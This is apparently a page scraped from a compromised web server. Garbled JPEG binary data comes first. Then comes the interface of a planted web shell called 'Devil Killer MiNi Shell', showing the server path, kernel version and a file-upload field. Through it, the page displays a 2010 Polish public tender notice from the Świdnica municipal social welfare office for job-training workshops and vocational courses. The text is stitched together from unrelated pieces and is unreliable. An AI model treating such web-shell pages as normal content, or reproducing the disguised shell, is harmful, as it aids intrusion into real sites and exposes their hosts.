JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100514/130730-N-2010.html

<p class="kh_header"><b>Świdnica: organizacja i przeprowadzenie warsztatów szkoleniowych i kursów zawodowych 
w ramach projektu systemowego Uwierz we własne siły</b><br>
<b>Numer ogłoszenia: 130730 - 2010; data zamieszczenia: 14.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Wałbrzyska 15, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8537139, faks 074 8537139.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.swidnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja i przeprowadzenie warsztatów szkoleniowych i kursów zawodowych 
w ramach projektu systemowego Uwierz we własne siły.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie warsztatów szkoleniowych i kursów zawodowych w ramach projektu systemowego Uwierz we własne siły współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego Kapitał Ludzki. Priorytet - VII Promocja integracji społecznej, Działanie: 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie: 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej na lata 2007-2013.
Szkolenie skierowane jest do 21 dorosłych osób w wieku aktywności zawodowej, bezrobotnych lub nieaktywnych zawodowo, poszukujących pracy, korzystających ze świadczeń pomocy społecznej. Posiadających wykształcenie co najwyżej średnie (ogólne lub zawodowe).

1.2. INSTRUMENT AKTYWIZACJI SPOLECZNEJ
W ramach warsztatów szkoleniowych zaplanowano moduły o następujących kierunkach:
Moduł I PSYCHOLOGICZNY - warsztaty rozwoju osobistego
- komunikacja interpersonalna,
- budowanie zaufania oraz poczucia bezpieczeństwa w grupie,
- wzmocnienie poczucia własnej wartości,
- obraz siebie i wstępne rozpoznanie oczekiwań umiejętności i możliwości,
- radzenie sobie ze stresem i sytuacjami trudnymi,
- radzenie sobie z własnymi uczuciami w sytuacjach trudnych,
- przełamywanie barier tkwiących w nas,
W ramach warsztatów przewidziane są 4 spotkania po 6 godzin dla 2 grup - łącznie - 48 godzin.
Moduł II PEDAGOGICZNY - warsztaty pedagogiczne
- umiejętność wypełniana przypisanych ról społecznych,
- wspomaganie rozwoju dziecka i rozwijanie umiejętności wychowawczych,
- istota komunikacji międzyludzkiej - międzypokoleniowej,
- rozwijanie umiejętności diagnozowania potrzeb drugiego człowieka ,
- rozpoznawanie niebezpieczeństw, 
-diagnozowanie uzależnień i profilaktyka (metody aktywizujące),
W ramach warsztatów przewidziane są 3 spotkania po 6 godzin dla 2 grup - łącznie 36 godzin.

Moduł III ZDROWOTNY
- promocja zdrowego stylu życia,
- umiejętność dbania o zdrowie swoje i rodziny,
- higiena, diagnoza i profilaktyka,
- poprawa własnego wizerunku
W ramach warsztatów przewidziane są 2 spotkania po 6 godzin dla wszystkich 21 uczestników - łącznie 12 godzin.

1.3 INSTRUMENT AKTYWIZACJI ZAWODOWEJ - obejmuje warsztaty
wzmacniające z doradcą zawodowym:
- odkrywanie potencjału zawodowego,
- podniesienie poczucia własnej wartości i motywacji poprzez rozpoznanie kompetencji i predyspozycji zawodowych, 
- poznanie sposobów i metod poszukiwania zatrudnienia (źródła ofert pracy),
- przygotowanie dokumentacji aplikacyjnej (CV, list motywacyjny),
- przygotowanie do spotkania z potencjalnym pracodawcą,
- rozmowa kwalifikacyjna,
- komunikacja interpersonalna,
- autoprezentacja
W ramach warsztatów przewidziane są 2 spotkania po 6 godzin dla 2 grup - łącznie 24 godziny, oraz indywidualne konsultacje z doradcą zawodowym - dla każdego uczestnika projektu po 2 godziny x 21 osób = 42 godziny.
Zajęcia odbywać się będą co najmniej 2 razy w tygodniu 6 godzin lekcyjnych dziennie, od godziny dziewiątej, z zachowaniem przerw międzylekcyjnych (45 minut zajęć i 15 minut przerwy).

1.4 INSTRUMENT AKTYWIZACJI EDUKACYJNEJ -  zaplanowano następujące kursy zawodowe:
1. Kurs zawodowy - Wyspecjalizowany opiekun do dzieci- grupa 11 osobowa
- kurs przygotowawczy podstawowy nabycie wiedzy i umiejętności w zakresie zawodu opiekun do dziecka,
- kurs przygotowawczy rozszerzony - nabycie wiedzy i umiejętności dla wychowawców placówek wypoczynku dzieci i młodzieży dla 2 osób (posiadających średnie wykształcenie)
- czas trwania kursu podstawowego - średnio 3 miesiące dla każdego uczestnika projektu, ale liczba godzin nie może być mniejsza niż 90 godzin,
- czas trwania kursu rozszerzonego - 36 godzin (dla 2 osób posiadających średnie wykształcenie)
- zajęcia odbywać się będą co najmniej 2 razy w tygodniu 6 godzin lekcyjnych dziennie, od godziny dziewiątej, z zachowaniem przerw międzylekcyjnych (45 minut zajęć i 15 minut przerwy).
2. Kurs zawodowy Magazynier-logistyk- grupa 10 osobowa
- nabycie wiedzy i umiejętności w zakresie Magazynier-logistyk z komputerową obsługą programów magazynowych oraz kas fiskalnych z rozszerzeniem o minimum sanitarne.
- zajęcia z zakresu obsługi komputera oraz kas fiskalnych powinny zostać przeprowadzone w jednym czasie, tak aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko kasowo-komputerowe. Należy zapewnić jednocześnie 10 kas komputerów.
- czas trwania kursu - średnio 3 miesiące dla każdego uczestnika projektu, ale liczba godzin nie może być mniejsza niż 90 godzin
- zajęcia odbywać się będą co najmniej 2 razy w tygodniu 6 godzin lekcyjnych dziennie, od godziny dziewiątej, z zachowaniem przerw międzylekcyjnych (45 minut zajęć i 15 minut przerwy)

1.5 W ramach każdego NSTRUMENTU AKTYWNEJ INTEGRACJI Wykonawca zobowiązuje się przeszkolić dwie grupy 11 i 10 osobową.
1.6 W szczególnie uzasadnionych przypadkach Zamawiający przewiduje możliwość zmniejszenia liczby osób lub gdy liczba zainteresowana szkoleniem będzie mniejsza niż planowana;
1.7 Warsztaty szkoleniowe  w ramach INSTRUMENTU AKTYWIZACJI SPOŁECZNEJ I ZAWODOWEJ - obejmować mają 162 godziny dydaktyczne (w tym 2 godz. Indywidualnych konsultacji z doradcą zawodowym dla każdego uczestnika projektu) oraz w ramach INSTRUMENTU AKTYWIZACJI EDUKACYJNEJ-  min. po 90 godzin na każdy z kursów zawodowych (jedna godzina to 45 minut zajęć i 15 minut przerwy).
1.8 Warsztaty szkoleniowe i kursy zawodowe odbywać się będą od 09:00 w dniach od poniedziałku do piątku.
1.9.  Ponadto Wykonawca zobowiązuje się:
1.9.1. Dostarczyć ramowy program realizacji szkoleń/kursów uwzględniający:
- program nauczania,
- proponowaną liczbę godzin na poszczególne bloki tematyczne,
-  ilość godzin praktycznych i teoretycznych,
1.9.2. Zapewnić, na potrzeby realizacji warsztatów szkoleniowych i kursów zawodowych, bazę lokalową i zaplecze dydaktyczne, znajdujące się na terenie miasta Świdnicy województwa dolnośląskiego
1.9.3. Przygotować i oznaczyć dokumentację związaną z przeprowadzonymi cyklami szkoleń i kursów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, sporządzać listy obecności na zajęciach,
1.9.4. W zakresie wykonywania usługi Wykonawca zobowiązuje się dodatkowo informować Zamawiającego o wszelkich nieobecnościach uczestników szkolenia do 2 dni po zaistnieniu tego faktu. Informację o nieobecności uczestników szkolenia i kursów zawodowych Wykonawca prześle Zamawiającemu e-mailem, faxem lub telefonicznie do Kierownika lub Koordynatora projektu.
1.9.5. Zabezpieczyć każdemu z uczestników szkoleń i kursów warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania cyklu szkoleń i kursów jak i materiałów i sprzętu niezbędnych do realizacji zajęć szkoleniowych,
1.9.6. Przekazania uczestnikom oraz Zamawiającemu przed rozpoczęciem cyklu szkoleń i kursów harmonogramu zajęć a w przypadku nanoszenia w nim zmian informowania pisemnie Zamawiającego o tych zmianach i dostarczenia aktualnego harmonogramu,
1.9.7. Prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
- listy obecności, dziennik zajęć edukacyjnych zawierający wymiar godzin i tematy zajęć edukacyjnych
- rejestr wydanych zaświadczeń lub innych wydanych dokumentów potwierdzających ukończenie cyklu szkoleń i uzyskanie kwalifikacji zawodowych (odbiór dokumentów winien być potwierdzony w rejestrze przez każdego uczestnika własnoręcznym podpisem)
1.9.8. Dostarczenia Zamawiającemu w terminie do: 5-go dnia każdego miesiąca oryginału listy obecności za poprzedni miesiąc (listy muszą być czytelne, kompletne i zatwierdzone przez osobę upoważnioną ze strony Wykonawcy, natomiast obecność uczestnika musi być każdorazowo potwierdzona własnoręcznym podpisem przez uczestnika szkolenia kursu)
1.9.9. Przeprowadzić ewaluacje i monitoring szkoleń.
1.9.10. Przekazać dokumentację dot. cyklu szkoleń i kursów do siedziby Zamawiającego w terminie do 14 dni po zakończeniu szkoleń kursów.
1.9.11. Wydać uczestnikowi Projektu zaświadczenia potwierdzającego ukończenie szkoleń i kursu zawodowego.
1.9.12. Dla wszystkich uczestników szkoleń i kursów Wykonawca zapewni przez okres ich trwania obsługę cateringową w formie serwisu kawowego (kawa, herbata, ciastka różne, cukier, cytryna, mleko lub śmietanka). W przypadku warsztatów szkoleniowych dodatkowo obiad w postaci drugiego dania każdego dnia szkolenia.
1.9.13. Ubezpieczyć uczestników cyklu szkoleń i kursów od nieszczęśliwych wypadków powstałych w czasie trwania cyklu szkoleń i kursów w drodze do i z miejsca szkoleń i kursów na czas prowadzonych zajęć oraz zobowiązuje się do prowadzenia ewentualnego postępowania o wyrównanie szkody powstałej z tytułu wypadków w czasie cyklu szkoleń i kursów oraz w drodze do i z miejsca cyklu szkoleń i kursów (potwierdzoną za zgodność z oryginałem kserokopią polisy ubezpieczeniowej do okazania Zamawiającemu przed podpisaniem umowy)
1.9.14. Przedstawienia na pisemne wezwania Zamawiającego wszelkich informacji i wyjaśnień związanych z realizacją cyklu szkoleń i kursów zawodowych w terminie określonym w wezwaniu.
1.9.15. Przestrzegania zasad wynikających z przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz.U.2002 r. Nr 101 poz. 926 z późniejszymi zmianami).
1.9.16. Wykonawca zobowiązuje się po zrealizowanej umowie do przedstawienia w terminie 7 dni raportu końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga  się wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie może się ubiegać Wykonawca, który spełnia warunki dotyczące:
7.1.	posiadania uprawnień do wykonania zamówienia zgodnie z ustawą  z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy - tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm. tj. posiada wpis do rejestru instytucji szkoleniowych (Posiadanie przez instytucję szkoleniową wpisu do rejestru instytucji szkoleniowych Zamawiający sprawdzi w centralnym rejestrze instytucji szkoleniowych, dostępnym na stronie internetowej www.ris.praca.gov.pl)
7.2.	Posiadania doświadczenia zawodowego wyrażającego się wykonaniem przynajmniej dwóch szkoleń w ramach projektów systemowych w zakresie zbliżonym do przedmiotu zamówienia z potwierdzeniem, że usługa została wykonana należycie, o wartości nie mniejszej niż 60 tys. zł z potwierdzeniem, że usługi zostały wykonane należycie lub są wykonywane należycie 
7.3.	Dysponowania osobami zdolnymi do wykonania zamówienia; tj. sześć osób (1 osoba na moduł psychologiczny, 1 osoba na moduł pedagogiczny, 1 osoba na moduł zdrowotny, 1 osoba na instrument aktywizacji zawodowej, 1 osoba na kurs zawodowy wyspecjalizowany opiekun do dzieci, 1 osoba kurs zawodowy magazynier logistyk) legitymującymi się dyplomem ukończenia studiów wyższych z minimum 3 letnim doświadczeniem w zakresie prowadzenia przedmiotowych warsztatów szkoleniowych kursów zawodowych,
7.4.	Nie podlegania wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ustawy.

Ocena spełnienia w w warunków dokonana zostanie zgodnie z formułą  spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt.8 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki wykonawca spełnił. 
Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem Wykonawcy z postępowania. 
Zamawiający wezwie wykonawców, którzy nie złożyli dokumentów potwierdzających spełnienie ww warunków lub, którzy nie złożyli pełnomocnictw, albo którzy złożyli dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. 
Złożone na wezwanie zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art.22 ust.1 ustawy - wg załącznika nr 2 do SIWZ
	Wykaz wykonanych usług polegających na wykonaniu przynajmniej dwóch szkoleń w ramach projektów systemowych w zakresie zbliżonym do przedmiotu zamówienia wykonanych w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie lub są wykonywane należycie (wg załącznika nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, 
tj sześć osób (1 osoba na moduł psychologiczny, 1 osoba na moduł pedagogiczny, 1 osoba na moduł zdrowotny, 1 osoba na instrument aktywizacji zawodowej, 1 osoba na kurs zawodowy wyspecjalizowany opiekun do dzieci, 1 osoba kurs zawodowy magazynier logistyk) legitymującymi się dyplomem ukończenia studiów wyższych z minimum 3 letnim doświadczeniem w zakresie prowadzenia przedmiotowych szkoleń oraz informacją o podstawie do dysponowania tymi osobami wg załącznika nr 6 .
 Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia według załącznika nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>osobami zdolnymi do wykonania zamówienia; tj. sześć osób (1 osoba na moduł psychologiczny, 1 osoba na moduł pedagogiczny, 1 osoba na moduł zdrowotny, 1 osoba na instrument aktywizacji zawodowej, 1 osoba na kurs zawodowy wyspecjalizowany opiekun do dzieci, 1 osoba kurs zawodowy magazynier logistyk) legitymującymi się dyplomem ukończenia studiów wyższych z minimum 3 letnim doświadczeniem w zakresie prowadzenia przedmiotowych warsztatów szkoleniowych/kursów zawodowych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - liczba szkolen - 20</li>
<li>3 - wykształcenie kadry - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.swidnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Świdnicy
ul. Wałbrzyska 15, 58-100 Świdnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2010 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Świdnicy
ul. Wałbrzyska 15, 58-100 Świdnica
pokój 203,pietro II.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt systemowy Uwierz we własne siły współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego Kapitał Ludzki. Priorytet - VII Promocja integracji społecznej, Działanie: 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie: 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej na lata 2007-2013..</p>
